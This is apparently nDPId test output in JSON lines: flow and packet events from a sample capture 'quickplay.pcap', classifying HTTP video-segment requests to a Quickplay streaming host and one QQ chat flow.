-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} -01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} 